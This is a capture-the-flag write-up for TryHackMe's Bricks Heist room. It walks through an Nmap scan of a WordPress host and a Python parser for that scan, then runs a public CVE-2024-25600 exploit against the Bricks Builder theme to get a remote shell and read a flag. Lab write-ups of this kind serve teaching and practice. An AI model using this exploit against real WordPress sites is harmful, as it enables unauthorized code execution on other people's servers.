TryHack3M Bricks Heist
This is a writeup for https://tryhackme.com/r/room/tryhack3mbricksheist
Add the room's IP address to /etc/hosts so that bricks.thm resolves to the target. Open the file with:
sudo nano /etc/hosts
Then append a line of the following form to the end of the file, replacing $IP with the room IP address:
$IP bricks.thm
Reconnaissance
Run an Nmap scan to enumerate open ports and services:
nmap -sV -sC -A -p 22,80,443,3306 10.10.249.30
Starting Nmap 7.60 ( https://nmap.org ) at 2024-04-15 17:51 BST
Nmap scan report for bricks.thm (10.10.249.30)
Host is up (0.00047s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http WebSockify Python/3.8.10
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 405 Method Not Allowed
| Server: WebSockify Python/3.8.10
| Date: Mon, 15 Apr 2024 16:51:17 GMT
| Connection: close
| Content-Type: text/html;charset=utf-8
| Content-Length: 472
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 405</p>
| <p>Message: Method Not Allowed.</p>
| <p>Error code explanation: 405 - Specified method is invalid for this resource.</p>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 501 Unsupported method ('OPTIONS')
| Server: WebSockify Python/3.8.10
| Date: Mon, 15 Apr 2024 16:51:17 GMT
| Connection: close
| Content-Type: text/html;charset=utf-8
| Content-Length: 500
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 501</p>
| <p>Message: Unsupported method ('OPTIONS').</p>
| <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
| </body>
|_ </html>
|_http-server-header: WebSockify Python/3.8.10
|_http-title: Error response
443/tcp open ssl/http Apache httpd
|_http-generator: WordPress 6.5
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache
|_http-title: Brick by Brick
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-04-02T11:59:14
|_Not valid after: 2025-04-02T11:59:14
3306/tcp open mysql MySQL (unauthorized)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
<REMOVED TO SAVE LENGTH>
MAC Address: 02:B2:AF:27:CD:65 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.8 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.8 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms bricks.thm (10.10.249.30)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.93 seconds
The scan output reveals:
Port 80: Python WebSockify server (not relevant for this exploit)
Port 443: Apache web server running WordPress 6.5
Port 3306: MySQL server (not relevant for this exploit)
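As an added example (not part of the original writeup), the following Python script parses the Nmap normal-output port table and NSE script results shown above into structured records and pulls out the fields that drive the rest of the walkthrough: the open ports, the WordPress version reported by http-generator, and the expiry date of the TLS certificate on port 443. The embedded scan text is a trimmed copy of the output above, with Nmap's indentation collapsed the way it appears on this page; the function and field names are the example's own.

```python
import re
from dataclasses import dataclass, field

# Trimmed copy of the Nmap output from the scan above, embedded so the script
# runs offline. The fingerprint-strings block is left out; script-output lines
# keep the "|" / "|_" prefixes exactly as Nmap prints them.
SAMPLE_SCAN = """\
Nmap scan report for bricks.thm (10.10.249.30)
Host is up (0.00047s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http WebSockify Python/3.8.10
|_http-server-header: WebSockify Python/3.8.10
|_http-title: Error response
443/tcp open ssl/http Apache httpd
|_http-generator: WordPress 6.5
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache
|_http-title: Brick by Brick
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-04-02T11:59:14
|_Not valid after: 2025-04-02T11:59:14
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 02:B2:AF:27:CD:65 (Unknown)
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \(([\d.]+)\))?")
# "22/tcp open ssh OpenSSH 8.2p1 ..." -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "|_http-title: Brick by Brick" or "| ssl-cert: Subject: ..." -> script name, first value line
SCRIPT_RE = re.compile(r"^\|_?\s*([A-Za-z0-9_.-]+):\s*(.*)$")
# Any other "|"-prefixed line continues the current script's output
CONT_RE = re.compile(r"^\|_?\s*(.*)$")
WP_RE = re.compile(r"WordPress\s+([\d.]+)")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    scripts: dict = field(default_factory=dict)  # script name -> output text


def parse_nmap(text):
    """Parse Nmap normal output; return (host_ip_or_name, [Port, ...])."""
    host, ports, current, current_script = None, [], None, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(2) or m.group(1)
            continue
        m = PORT_RE.match(line)
        if m:
            current = Port(int(m.group(1)), m.group(2), m.group(3),
                           m.group(4), m.group(5).strip())
            ports.append(current)
            current_script = None
            continue
        if current is None or not line.startswith("|"):
            continue  # headers, host lines, OS guesses: not part of a port entry
        m = SCRIPT_RE.match(line)
        if m:
            current_script = m.group(1)
            current.scripts[current_script] = m.group(2)
        elif current_script is not None:
            current.scripts[current_script] += "\n" + CONT_RE.match(line).group(1)
    return host, ports


def summarize(ports):
    """Pull out the facts the walkthrough relies on from parsed ports."""
    findings = {"open_ports": [], "wordpress_version": None,
                "wordpress_port": None, "cert_not_after": None}
    for p in ports:
        if p.state == "open":
            findings["open_ports"].append(p.number)
        m = WP_RE.search(p.scripts.get("http-generator", ""))
        if m:
            findings["wordpress_version"] = m.group(1)
            findings["wordpress_port"] = p.number
        m = re.search(r"Not valid after:\s*(\S+)", p.scripts.get("ssl-cert", ""))
        if m:
            findings["cert_not_after"] = m.group(1)
    return findings


if __name__ == "__main__":
    host, ports = parse_nmap(SAMPLE_SCAN)
    print(host)
    for p in ports:
        print(f"{p.number}/{p.proto} {p.state} {p.service} {p.version}")
    print(summarize(ports))
```

The parser keys on the `|` / `|_` prefixes rather than on column positions, so it copes with the collapsed whitespace seen on this page as well as with Nmap's real indented output; multi-line script results such as ssl-cert are joined back together under one key so the validity dates can be read with a single search.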
Exploitation
Run the CVE-2024-25600 exploit script (a public PoC for the WordPress Bricks Builder theme) against the target:
root@ip-10-10-23-59:~# python3 CVE-2024-25600.py -u https://10.10.213.55
[ASCII-art banner printed by the exploit script; it did not survive extraction and is omitted here]
Coded By: K3ysTr0K3R --> Hello, Friend!
[*] Checking if the target is vulnerable
[+] The target is vulnerable
[*] Initiating exploit against: https://10.10.213.55
[*] Initiating interactive shell
[+] Interactive shell opened successfully
Shell> ls
650c844110baced87e1606453b93f22a.txt
index.php
kod
license.txt
phpmyadmin
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
Shell> cat 650c844110baced87e1606453b93f22a.txt
THM{DIY}
The flag is in 650c844110baced87e1606453b93f22a.txt in the web root; reading that file with cat returns the flag.
TL;DR: Add bricks.thm to /etc/hosts, use the WordPress Bricks exploit to gain a shell, and read the flag.